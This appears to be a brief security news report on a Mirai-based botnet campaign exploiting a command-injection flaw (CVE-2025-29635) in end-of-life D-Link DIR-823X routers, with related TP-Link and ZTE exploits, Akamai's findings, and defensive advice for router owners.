A new Mirai-based malware campaign is exploiting CVE-2025-29635 in D-Link DIR-823X routers to recruit devices into a botnet, with Akamai saying it saw active exploitation attempts in March 2026 and that the flaw had not previously been observed in the wild.
KEY FACTS
- Vulnerability CVE-2025-29635 is a command-injection flaw that can allow remote command execution.
- Target The issue affects D-Link DIR-823X routers running firmware versions 240126 and 24082.
- Payload Attackers downloaded a shell script named dlink.sh that installed Mirai malware called tuxnokill.
- Scope The same attack pattern also targeted TP-Link and ZTE routers, the report says.
Akamai’s technical analysis says the exploitation attempts began in early March 2026 and used POST requests to the /goform/set_prohibiting endpoint. The requests changed directories across writable paths, downloaded the script from an external IP and then executed it.
The payload installs a Mirai-based malware strain that supports multiple architectures and includes standard distributed denial-of-service tools such as TCP SYN, TCP ACK, STOMP, UDP floods and HTTP null attacks. The researchers said the same campaign also exploited CVE-2023-1389 in TP-Link routers and a separate remote code execution flaw in ZTE ZXV10 H108L devices.
The flaw was first disclosed 13 months ago by two researchers, who briefly published a proof-of-concept exploit before retracting it. The affected D-Link routers reached end of life in November 2024, and the report says the latest firmware is unlikely to address CVE-2025-29635.
WHY IT MATTERS
The campaign shows how end-of-life routers can remain exposed long after disclosure, especially when no patch is expected. Users are being advised to replace unsupported hardware, turn off remote administration if it is not needed, change default passwords and watch for configuration changes.